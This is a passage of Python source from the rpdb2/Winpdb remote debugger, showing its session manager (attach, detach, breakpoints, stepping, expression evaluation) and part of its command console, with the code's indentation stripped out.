# time.sleep() allows pending break requests to go through...
#
time.sleep(0.001)
self.getSession().getProxy().embedded_sync()
def on_event_exit(self, event):
self.m_printer(STR_DEBUGGEE_TERMINATED)
threading.Thread(target = self.detach_job).start()
def restart_session_job(self, fSendExitOnFailure = False):
try:
self.getSession().restart(sleep = 3)
return
except:
pass
self.m_fStop = True
if fSendExitOnFailure:
e = CEventExit()
self.m_event_dispatcher_proxy.fire_event(e)
return
self.m_printer(STR_LOST_CONNECTION)
self.detach_job()
def detach_job(self):
try:
self.detach()
except:
pass
def detach(self):
self.__verify_attached()
try:
self.save_breakpoints()
except:
print_debug_exception()
pass
self.m_printer(STR_ATTEMPTING_TO_DETACH)
self.m_state_manager.set_state(STATE_DETACHING)
self.__stop_event_monitor()
try:
#self.disable_breakpoint([], fAll = True)
try:
self.getSession().getProxy().set_trap_unhandled_exceptions(False)
self.request_go(fdetach = True)
except DebuggerNotBroken:
pass
finally:
self.m_state_manager.set_state(STATE_DETACHED)
self.m_session = None
self.m_printer(STR_DETACH_SUCCEEDED)
def __stop_event_monitor(self):
self.m_fStop = True
if self.m_worker_thread is not None:
if thread.get_ident() != self.m_worker_thread_ident:
try:
self.getSession().getProxy().null()
except:
pass
self.m_worker_thread.join()
self.m_worker_thread = None
self.m_worker_thread_ident = None
def request_break(self):
self.getSession().getProxy().request_break()
def request_go(self, fdetach = False):
self.getSession().getProxy().request_go(fdetach)
def request_go_breakpoint(self, filename, scope, lineno):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
self.getSession().getProxy().request_go_breakpoint(filename, scope, lineno, frame_index, fAnalyzeMode)
def request_step(self):
self.getSession().getProxy().request_step()
def request_next(self):
self.getSession().getProxy().request_next()
def request_return(self):
self.getSession().getProxy().request_return()
def request_jump(self, lineno):
self.getSession().getProxy().request_jump(lineno)
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding = None):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
if encoding == None:
encoding = self.m_encoding
self.getSession().getProxy().set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fAnalyzeMode, encoding)
def disable_breakpoint(self, id_list, fAll):
self.getSession().getProxy().disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
self.getSession().getProxy().enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
self.getSession().getProxy().delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
self.__verify_attached()
bpl = self.m_breakpoints_proxy.get_breakpoints()
return bpl
def save_breakpoints(self, filename = ''):
self.__verify_attached()
module_name = self.getSession().getServerInfo().m_module_name
if module_name[:1] == '<':
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'w'
else:
mode = 'wb'
path = calc_bpl_filename(module_name + filename)
file = open(path, mode)
try:
try:
bpl = self.get_breakpoints()
sbpl = pickle.dumps(bpl)
file.write(sbpl)
except:
print_debug_exception()
raise CException
finally:
file.close()
def load_breakpoints(self, filename = ''):
self.__verify_attached()
module_name = self.getSession().getServerInfo().m_module_name
if module_name[:1] == '<':
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'r'
else:
mode = 'rb'
path = calc_bpl_filename(module_name + filename)
file = open(path, mode)
ferror = False
try:
try:
bpl = pickle.load(file)
self.delete_breakpoint([], True)
except:
print_debug_exception()
raise CException
#
# No Breakpoints were found in file.
#
if filename == '' and len(bpl.values()) == 0:
raise IOError
for bp in bpl.values():
try:
if bp.m_scope_fqn != None:
bp.m_scope_fqn = as_unicode(bp.m_scope_fqn)
if bp.m_filename != None:
bp.m_filename = as_unicode(bp.m_filename)
if bp.m_expr != None:
bp.m_expr = as_unicode(bp.m_expr)
if bp.m_expr in [None, '']:
bp.m_encoding = as_unicode('utf-8')
self.set_breakpoint(bp.m_filename, bp.m_scope_fqn, bp.m_scope_offset, bp.m_fEnabled, bp.m_expr, bp.m_encoding)
except:
print_debug_exception()
ferror = True
if ferror:
raise CException
finally:
file.close()
def on_event_synchronicity(self, event):
ffire = self.m_fsynchronicity != event.m_fsynchronicity
self.m_fsynchronicity = event.m_fsynchronicity
if ffire:
event = CEventSynchronicity(event.m_fsynchronicity)
self.m_event_dispatcher.fire_event(event)
def set_synchronicity(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
if self.__is_attached():
try:
self.getSession().getProxy().set_synchronicity(fsynchronicity)
except NotAttached:
pass
event = CEventSynchronicity(fsynchronicity)
self.m_event_dispatcher.fire_event(event)
def get_synchronicity(self):
return self.m_fsynchronicity
def on_event_trap(self, event):
ffire = self.m_ftrap != event.m_ftrap
self.m_ftrap = event.m_ftrap
if ffire:
event = CEventTrap(event.m_ftrap)
self.m_event_dispatcher.fire_event(event)
def set_trap_unhandled_exceptions(self, ftrap):
self.m_ftrap = ftrap
if self.__is_attached():
try:
self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
except NotAttached:
pass
event = CEventTrap(ftrap)
self.m_event_dispatcher.fire_event(event)
def get_trap_unhandled_exceptions(self):
return self.m_ftrap
def is_unhandled_exception(self):
self.__verify_attached()
return self.getSession().getProxy().is_unhandled_exception()
def on_event_fork_mode(self, event):
ffire = ((self.m_ffork_into_child , self.m_ffork_auto) !=
(event.m_ffork_into_child, event.m_ffork_auto))
self.m_ffork_into_child = event.m_ffork_into_child
self.m_ffork_auto = event.m_ffork_auto
if ffire:
event = CEventForkMode(self.m_ffork_into_child, self.m_ffork_auto)
self.m_event_dispatcher.fire_event(event)
def set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
if self.__is_attached():
try:
self.getSession().getProxy().set_fork_mode(
self.m_ffork_into_child,
self.m_ffork_auto
)
except NotAttached:
pass
event = CEventForkMode(ffork_into_child, ffork_auto)
self.m_event_dispatcher.fire_event(event)
def get_fork_mode(self):
return (self.m_ffork_into_child, self.m_ffork_auto)
def get_stack(self, tid_list, fAll):
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_stack(tid_list, fAll, fAnalyzeMode)
return r
def get_source_file(self, filename, lineno, nlines):
assert(is_unicode(filename))
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_source_file(filename, lineno, nlines, frame_index, fAnalyzeMode)
return r
def get_source_lines(self, nlines, fAll):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_source_lines(nlines, fAll, frame_index, fAnalyzeMode)
return r
def get_thread_list(self):
(current_thread_id, thread_list) = self.getSession().getProxy().get_thread_list()
return (current_thread_id, thread_list)
def set_thread(self, tid):
self.reset_frame_indexes(None)
self.getSession().getProxy().set_thread(tid)
def get_namespace(self, nl, filter_level, repr_limit):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_namespace(nl, filter_level, frame_index, fAnalyzeMode, repr_limit, self.m_encoding, self.m_fraw)
return r
def evaluate(self, expr, fclear_completions = True):
assert(is_unicode(expr))
self.__verify_attached()
self.__verify_broken()
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
(value, warning, error) = self.getSession().getProxy().evaluate(expr, frame_index, fAnalyzeMode, self.m_encoding, self.m_fraw)
if fclear_completions:
self.m_completions.clear()
return (value, warning, error)
def execute(self, suite):
assert(is_unicode(suite))
self.__verify_attached()
self.__verify_broken()
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
(warning, error) = self.getSession().getProxy().execute(suite, frame_index, fAnalyzeMode, self.m_encoding)
self.m_completions.clear()
return (warning, error)
def set_encoding(self, encoding, fraw):
if (self.m_encoding, self.m_fraw) == (encoding, fraw):
return
self.m_encoding = encoding
self.m_fraw = fraw
event = CEventEncoding(encoding, fraw)
self.m_event_dispatcher.fire_event(event)
if self.__is_attached():
self.refresh()
def get_encoding(self):
return (self.m_encoding, self.m_fraw)
def set_host(self, host):
self.__verify_unattached()
try:
if not is_unicode(host):
host = host.decode('ascii')
host.encode('ascii')
except:
raise BadArgument
host = as_string(host, 'ascii')
try:
socket.getaddrinfo(host, 0, 0, socket.SOCK_STREAM)
except socket.gaierror:
if host.lower() != LOCALHOST:
raise
#
# Work-around for gaierror: (-8, 'Servname not supported for ai_socktype')
#
return self.set_host(LOOPBACK)
self.m_host = host
self.m_server_list_object = CServerList(host)
def get_host(self):
return as_unicode(self.m_host)
def calc_server_list(self):
if self.m_rpdb2_pwd is None:
raise UnsetPassword
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
server_list = self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors)
return (server_list, errors)
def get_server_info(self):
return self.getSession().getServerInfo()
def complete_expression(self, expr):
match = re.search(
r'(?P<unsupported> \.)? (?P<match> ((?P<scope> (\w+\.)* \w+) \.)? (?P<complete>\w*) $)',
expr,
re.U | re.X
)
if match == None:
raise BadArgument
d = match.groupdict()
unsupported, scope, complete = (d['unsupported'], d['scope'], d['complete'])
if unsupported != None:
raise BadArgument
if scope == None:
_scope = as_unicode('list(globals().keys()) + list(locals().keys()) + list(_RPDB2_builtins.keys())')
else:
_scope = as_unicode('dir(%s)' % scope)
if not _scope in self.m_completions:
(v, w, e) = self.evaluate(_scope, fclear_completions = False)
if w != '' or e != '':
print_debug('evaluate() returned the following warning/error: %s' % w + e)
return (expr, [])
cl = list(set(eval(v)))
if '_RPDB2_builtins' in cl:
cl.remove('_RPDB2_builtins')
self.m_completions[_scope] = cl
completions = [attr for attr in self.m_completions[_scope] if attr.startswith(complete)]
completions.sort()
if complete == '':
prefix = expr
else:
prefix = expr[:-len(complete)]
return (prefix, completions)
def _reset_frame_indexes(self, event):
self.reset_frame_indexes(None)
def reset_frame_indexes(self, event):
try:
self.m_state_manager.acquire()
if event is None:
self.__verify_broken()
elif self.m_state_manager.get_state() in [STATE_BROKEN, STATE_ANALYZE]:
return
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions.clear()
finally:
self.m_state_manager.release()
def set_stack_depth(self, event):
try:
self.m_state_manager.acquire()
self.__verify_broken()
self.m_stack_depth = event.m_stack_depth
self.m_stack_depth_exception = event.m_stack_depth_exception
self.m_frame_index = min(self.m_frame_index, self.m_stack_depth - 1)
self.m_frame_index_exception = min(self.m_frame_index_exception, self.m_stack_depth_exception - 1)
finally:
self.m_state_manager.release()
def set_frame_index(self, frame_index):
try:
self.m_state_manager.acquire()
self.__verify_broken()
if (frame_index < 0) or (self.m_stack_depth is None):
return self.get_frame_index(fLock = False)
if self.m_state_manager.get_state() == STATE_ANALYZE:
self.m_frame_index_exception = min(frame_index, self.m_stack_depth_exception - 1)
si = self.m_frame_index_exception
else:
self.m_frame_index = min(frame_index, self.m_stack_depth - 1)
si = self.m_frame_index
finally:
self.m_state_manager.release()
event = CEventStackFrameChange(si)
self.m_event_dispatcher.fire_event(event)
event = CEventNamespace()
self.m_event_dispatcher.fire_event(event)
return si
def get_frame_index(self, fLock = True):
try:
if fLock:
self.m_state_manager.acquire()
self.__verify_attached()
if self.m_state_manager.get_state() == STATE_ANALYZE:
return self.m_frame_index_exception
else:
return self.m_frame_index
finally:
if fLock:
self.m_state_manager.release()
def set_analyze(self, fAnalyze):
try:
self.m_state_manager.acquire()
if fAnalyze and (self.m_state_manager.get_state() != STATE_BROKEN):
raise DebuggerNotBroken
if (not fAnalyze) and (self.m_state_manager.get_state() != STATE_ANALYZE):
return
state = [STATE_BROKEN, STATE_ANALYZE][fAnalyze]
self.m_state_manager.set_state(state, fLock = False)
finally:
self.m_state_manager.release()
self.refresh()
def getSession(self):
self.__verify_attached()
return self.m_session
def get_state(self):
return as_unicode(self.m_state_manager.get_state())
def set_password(self, _rpdb2_pwd):
assert(is_unicode(_rpdb2_pwd))
if not is_valid_pwd(_rpdb2_pwd):
raise BadArgument
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = _rpdb2_pwd
finally:
self.m_state_manager.release()
def set_random_password(self):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_rpdb2_pwd = generate_random_password()
self.m_printer(STR_RANDOM_PASSWORD)
finally:
self.m_state_manager.release()
def get_password(self):
return self.m_rpdb2_pwd
def set_remote(self, fAllowRemote):
try:
self.m_state_manager.acquire()
self.__verify_unattached()
self.m_fAllowRemote = fAllowRemote
finally:
self.m_state_manager.release()
def get_remote(self):
return self.m_fAllowRemote
def set_environ(self, envmap):
self.m_environment = []
try:
for k, v in envmap:
k = as_unicode(k, fstrict = True)
v = as_unicode(v, fstrict = True)
self.m_environment.append((k, v))
except:
raise BadArgument
def get_environ(self):
return self.m_environment
def stop_debuggee(self):
self.__verify_attached()
try:
self.save_breakpoints()
except:
print_debug_exception()
pass
self.m_printer(STR_ATTEMPTING_TO_STOP)
self.m_printer(STR_ATTEMPTING_TO_DETACH)
self.m_state_manager.set_state(STATE_DETACHING)
self.__stop_event_monitor()
try:
self.getSession().getProxy().stop_debuggee()
finally:
self.m_state_manager.set_state(STATE_DETACHED)
self.m_session = None
self.m_printer(STR_DETACH_SUCCEEDED)
class CConsoleInternal(cmd.Cmd, threading.Thread):
def __init__(self, session_manager, stdin = None, stdout = None, fSplit = False):
global g_fDefaultStd
cmd.Cmd.__init__(self, stdin = stdin, stdout = stdout)
threading.Thread.__init__(self)
self.fAnalyzeMode = False
self.fPrintBroken = True
self.m_filename = as_unicode('')
self.m_completion_thread = None
self.use_rawinput = [1, 0][fSplit]
self.m_fSplit = fSplit
self.prompt = [[CONSOLE_PROMPT, CONSOLE_PROMPT_ANALYZE][self.fAnalyzeMode], ""][fSplit]
self.intro = CONSOLE_INTRO
if fSplit:
self.intro += '\n'
#thread_set_daemon(self, True)
self.m_session_manager = session_manager
self.m_session_manager.set_printer(self.printer)
event_type_dict = {CEventState: {}}
self.m_session_manager.register_callback(self.event_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSynchronicity: {}}
self.m_session_manager.register_callback(self.synchronicity_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventTrap: {}}
self.m_session_manager.register_callback(self.trap_handler, event_type_dict, fSingleUse = False)
event_type_dict = {CEventForkMode: {}}
self.m_session_manager.register_callback(self.fork_mode_handler, event_type_dict, fSingleUse = False)
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
self.m_fAddPromptBeforeMsg = False
self.m_eInLoop = threading.Event()
self.cmdqueue.insert(0, '')
self.m_stdout = self.stdout
self.m_encoding = detect_encoding(self.stdin)
g_fDefaultStd = (stdin == None)
if self.use_rawinput:
try:
import readline
cd = readline.get_completer_delims()
if not '.' in cd:
readline.set_completer_delims(cd + '.')
except:
pass
def set_filename(self, filename):
assert(is_unicode(filename))
self.m_filename = filename
def precmd(self, line):
line = as_unicode(line, self.m_encoding)
self.m_fAddPromptBeforeMsg = True
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.set()
time.sleep(0.01)
if not line.strip():
return line
command = line.split(' ', 1)[0].split(SOURCE_MORE, 1)[0].split(SOURCE_LESS, 1)[0]
if command not in ['list', 'l']:
self.m_last_source_line = None
self.m_last_nlines = DEFAULT_NUMBER_OF_LINES
return line
def postcmd(self, stop, line):
self.m_fAddPromptBeforeMsg = False
return stop
def onecmd(self, line):
"""
Default Error handling and reporting of session manager errors.
"""
try:
return cmd.Cmd.onecmd(self, line)
except (socket.error, CConnectionException):
self.m_session_manager.report_exception(*sys.exc_info())
except CException:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.m_session_manager.report_exception(*sys.exc_info())
print_debug_exception(True)
return False
def default(self, line):
"""
Called on an input line when the command prefix is not recognized.
Over-rides base method at cmd.py.
"""
self.printer(STR_BAD_SYNTAX % line)
def emptyline(self):
pass
def complete(self, text, state):
"""
Return the next possible completion for 'text'.
If a command has not been entered, then complete against command list.
Otherwise try to call complete_<command> to get list of completions.
"""
if self.use_rawinput:
#
# Import cmd to workaround a strange bug in Python.
#
import cmd
return cmd.Cmd.complete(self, text, state)
#
# Without rawinput assuming text includes entire buffer up to cursor.
#
try:
if state != 0:
return self.completion_matches[state]
if not ' ' in text:
self.completion_matches = self.completenames(text)
return self.completion_matches[state]
cmd, args, foo = self.parseline(text)
if cmd == '' or not hasattr(self, 'complete_' + cmd):
self.completion_matches = self.completedefault(text)
return self.completion_matches[state]
compfunc = getattr(self, 'complete_' + cmd)
self.completion_matches = compfunc(text)
return self.completion_matches[state]
except IndexError:
return None
def complete_launch(self, text, line = None, begidx = None, endidx = None):
if line != None and endidx != None:
text = line[:endidx]
if text.endswith(' '):
dn, bn = '', ''
else:
path = text.split()[-1]
dn, bn = os.path.split(path)
prefix = text
if bn != '':
prefix = prefix[:-len(bn)]
if dn == '' and bn.startswith('~'):
if bn == os.path.expanduser(bn):
c = text
else:
c = os.path.join(text, '')
if begidx != None:
c = c[begidx:]
return [c]
pl = [dn]
if dn == '':
pl += os.environ['PATH'].split(os.pathsep)
fl = []
for p in pl:
if p == '':
p = '.'
try:
ep = os.path.expanduser(p)
l = os.listdir(ep)
for f in l:
if not f.startswith(bn):
continue
root, ext = os.path.splitext(f)
if not ext in ['.py', '.pyw', '']:
continue
if os.path.isdir(os.path.join(ep, f)):
c = prefix + os.path.join(f, '')
else:
c = prefix + f
if begidx != None:
c = c[begidx:]
fl.append(c)
except:
pass
fs = set(fl)
cl = list(fs)
cl.sort()
return cl
def complete_eval(self, text, line = None, begidx = None, endidx = None):
t = self.m_completion_thread
if t != None and thread_is_alive(t):
return []
self.m_completion_thread = None
result = [('', [])]
if line != None and endidx != None:
text = line[:endidx]
t = threading.Thread(target = self.complete_expression_job, args = (text, result))
t.start()
t.join(PING_TIMEOUT)
if thread_is_alive(t):
self.m_completion_thread = t
return []
(prefix, completions) = result[-1]
if begidx != None:
prefix = prefix[begidx:]
ce = [prefix + c for c in completions]
return ce
complete_v = complete_eval
complete_exec = complete_eval
complete_x = complete_exec
def complete_expression_job(self, text, result):
try:
(prefix, completions) = self.m_session_manager.complete_expression(text)
result.append((prefix, completions))
except:
print_debug_exception()
def run(self):
self.cmdloop()
def __get_str_wrap(self, _str, max_len):
if len(_str) <= max_len and not '\n' in _str:
return (_str, '')
s = _str[: max_len]
i = s.find('\n')
if i == -1:
i = s.rfind(' ')
if i == -1:
return (s, _str[max_len:])
return (_str[: i], _str[i + 1:])
def printer(self, _str):
if not event_is_set(self.m_eInLoop):
self.m_eInLoop.wait()
fAPBM = self.m_fAddPromptBeforeMsg
prefix = ['', self.prompt.strip('\n')][fAPBM] + CONSOLE_PRINTER
suffix = '\n' + [self.prompt.strip('\n'), ''][fAPBM]
s = _str
while s != '':
s, _s = self.__get_str_wrap(s, CONSOLE_WRAP_INDEX - len(prefix + suffix))
_print(prefix + s + suffix, self.m_stdout, feol = False)
s = _s
self.m_stdout.flush()
def print_notice(self, notice):
nl = notice.split('\n')
i = 0
for l in nl:
_print(l, self.m_stdout)
i += 1
if i % PRINT_NOTICE_LINES_PER_SECTION == 0:
_print("\n" + PRINT_NOTICE_PROMPT, self.m_stdout, feol = False)
response = self.stdin.readline()
if response != '\n':
break
_print('', self.m_stdout)
def event_handler(self, event):
state = event.m_state
if (state == STATE_BROKEN) and self.fPrintBroken:
self.fPrintBroken = False
self.printer(STR_DEBUGGER_HAS_BROKEN)
return
if (state != STATE_ANALYZE) and self.fAnalyzeMode:
self.fAnalyzeMode = False
self.prompt = [CONSOLE_PROMPT, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_OFF)
return
if (state == STATE_ANALYZE) and not self.fAnalyzeMode:
self.fAnalyzeMode = True
self.prompt = [CONSOLE_PROMPT_ANALYZE, ""][self.m_fSplit]
self.printer(STR_ANALYZE_MODE_TOGGLE % MODE_ON)
return
def synchronicity_handler(self, event):
self.printer(STR_SYNCHRONICITY_MODE % str(event.m_fsynchronicity))
def trap_handler(self, event):
self.printer(STR_TRAP_MODE_SET % str(event.m_ftrap))
def fork_mode_handler(self, event):
x = [FORK_PARENT, FORK_CHILD][event.m_ffork_into_child]
y = [FORK_MANUAL, FORK_AUTO][event.m_ffork_auto]
self.printer(STR_FORK_MODE_SET % (x, y))
def do_launch(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
if arg[:2] == '-k':
fchdir = False
_arg = arg[2:].strip()
else:
fchdir = True
_arg = arg
self.fPrintBroken = True
try:
self.m_session_manager.launch(fchdir, _arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_restart(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.restart()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % arg)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def do_attach(self, arg):
if arg == '':
return self.__scripts(arg)
self.fPrintBroken = True
try:
self.m_session_manager.attach(arg)
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
def __scripts(self, arg):
if self.m_session_manager.get_password() is None:
_print(STR_PASSWORD_MUST_BE_SET, self.m_stdout)
return
host = self.m_session_manager.get_host()
_print(STR_SCRIPTS_CONNECTING % host, self.m_stdout)
(server_list, errors) = self.m_session_manager.calc_server_list()
if server_list == []:
_print(STR_SCRIPTS_NO_SCRIPTS % host, self.m_stdout)
return
try:
spid = self.m_session_manager.get_server_info().m_pid
except NotAttached:
spid = None
_print(STR_SCRIPTS_TO_DEBUG % host, self.m_stdout)
for s in server_list:
m = ['', SYMBOL_MARKER][spid == s.m_pid]
_print(' %1s %-5d %s' % (m, s.m_pid, s.m_filename), self.m_stdout)
def do_detach(self, arg):
if not arg == '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.detach()
def do_host(self, arg):
if arg == '':
host = self.m_session_manager.get_host()
_print(host, self.m_stdout)
return
try:
self.m_session_manager.set_host(arg)
except socket.gaierror:
e = sys.exc_info()[1]
self.printer(MSG_ERROR_HOST_TEXT % (arg, e))
def do_break(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
self.m_session_manager.request_break()
do_b = do_break
def __parse_bp_arg(self, arg, fAllowExpr = True):
_args = arg.split(BP_EVAL_SEP)
if (len(_args) > 1) and (not fAllowExpr):
raise BadArgument
if len(_args) > 1:
expr = _args[1].strip()
else:
expr = ''
rf = _args[0].rfind(BP_FILENAME_SEP)
if rf == -1:
args = [_args[0]]
else:
args = [_args[0][:rf], _args[0][rf + 1:]]
filename = ['', args[0]][len(args) > 1]
if filename in [None, '']:
filename = self.m_filename
try:
lineno = int(args[-1])
scope = ''
except ValueError:
lineno = 0
scope = args[-1].strip()
return (filename, scope, lineno, expr)
def do_go(self, arg):
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
if arg != '':
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = False)
self.fPrintBroken = True
self.m_session_manager.request_go_breakpoint(filename, scope, lineno)
return
self.fPrintBroken = True
self.m_session_manager.request_go()
return
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
except:
self.fPrintBroken = False
raise
self.fPrintBroken = False
do_g = do_go
def do_step(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_step()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_s = do_step
def do_next(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_next()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_n = do_next
def do_return(self, arg):
if arg != '':
self.printer(STR_BAD_ARGUMENT)
return
if self.fAnalyzeMode:
self.printer(STR_ILEGAL_ANALYZE_MODE_CMD)
return
try:
self.m_session_manager.request_return()
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_r = do_return
def do_jump(self, arg):
try:
lineno = int(arg)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
return
try:
self.m_session_manager.request_jump(lineno)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
do_j = do_jump
def do_bp(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
(filename, scope, lineno, expr) = self.__parse_bp_arg(arg, fAllowExpr = True)
self.m_session_manager.set_breakpoint(filename, scope, lineno, True, expr)
except BadArgument:
self.printer(STR_BAD_ARGUMENT)
except IOError:
self.printer(STR_FILE_NOT_FOUND % filename)
except InvalidScopeName:
self.printer(STR_SCOPE_NOT_FOUND % scope)
except SyntaxError:
self.printer(STR_BAD_EXPRESSION % expr)
except DebuggerNotBroken:
self.m_session_manager.report_exception(*sys.exc_info())
def do_be(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.enable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bd(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.disable_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bc(self, arg):
if arg == '':
self.printer(STR_BAD_ARGUMENT)
return
try:
id_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
id_list = [int(sid) for sid in sid_list]
self.m_session_manager.delete_breakpoint(id_list, fAll)
except ValueError:
self.printer(STR_BAD_ARGUMENT)
def do_bl(self, arg):
bpl = self.m_session_manager.get_breakpoints()
bplk = list(bpl.keys())
bplk.sort()
_print(STR_BREAKPOINTS_LIST, self.m_stdout)
for id in bplk:
bp = bpl[id]
if bp.m_expr:
expr = bp.m_expr
else:
expr = ''
try:
expr.encode('ascii', 'strict')
encoding = ''
except:
encoding = bp.m_encoding
scope = bp.m_scope_fqn
if scope.startswith(MODULE_SCOPE + '.'):
scope = scope[len(MODULE_SCOPE) + 1:]
elif scope.startswith(MODULE_SCOPE2 + '.'):
scope = scope[len(MODULE_SCOPE2) + 1:]
state = [STATE_DISABLED, STATE_ENABLED][bp.isEnabled()]
s = STR_BREAKPOINTS_TEMPLATE % (id, state, bp.m_lineno, clip_filename(bp.m_filename, 45), calc_suffix(scope, 45), calc_prefix(expr, 50), encoding)
_print(s.rstrip() + '\n', self.m_stdout)
def do_save(self, arg):
self.m_session_manager.save_breakpoints(arg)
_print(STR_BREAKPOINTS_SAVED, self.m_stdout)
return
def do_load(self, arg):
try:
self.m_session_manager.load_breakpoints(arg)
_print(STR_BREAKPOINTS_LOADED, self.m_stdout)
return
except IOError:
error = [STR_BREAKPOINTS_FILE_NOT_FOUND, STR_BREAKPOINTS_NOT_FOUND][arg == '']
self.printer(error)
def do_stack(self, arg):
if self.fAnalyzeMode and (arg != ''):
self.printer(STR_ILEGAL_ANALYZE_MODE_ARG)
return
try:
tid_list = []
fAll = (arg == SYMBOL_ALL)
if not fAll:
sid_list = arg.split()
tid_list = [int(sid) for sid in sid_list]
sl = self.m_session_manager.get_stack(tid_list, fAll)
if len(sl) == 0:
self.printer(STR_NO_THREADS_FOUND)
return
frame_index = self.m_session_manager.get_frame_index()
m = None
for st in sl:
s = st.get(DICT_KEY_STACK, [])
tid = st.get(DICT_KEY_TID, 0)
fBroken = st.get(DICT_KEY_BROKEN, False)
fCurrent = st.get(DICT_KEY_CURRENT_TID, False)
if m is not None:
_print('', self.m_stdout)
_print(STR_STACK_TRACE % tid, self.m_stdout)
i = 0
while i < len(s):
e = s[-(1 + i)]
marker = [SOURCE_STATE_UNBROKEN, SYMBOL_MARKER][fBroken]
if fCurrent:
m = ['', marker][i == frame_index]
else:
m = ['', marker][i == 0]
_print(' %1s %5d %-28s %4d %s' % (m, i, calc_suffix(e[0], 28), e[1], calc_prefix(e[2], 20)), self.m_stdout)
i += 1
except ValueError:
self.printer(STR_BAD_ARGUMENT)
except (NoExceptionFound, NoThreads):
self.m_session_manager.report_exception(*sys.exc_info())
do_k = do_stack
def do_list(self, arg):
rf = arg.rfind(BP_FILENAME_SEP)
if rf == -1:
_filename = ''
__args2 = arg
else:
_filename = arg[:rf]
__args2 = arg[rf + 1:]
_args = __args2.split(BP_EVAL_SEP)
fAll = (_args[0] == SYMBOL_ALL)
fMore = (_args[0] == SOURCE_MORE)
fLess = (_args[0] == SOURCE_LESS)
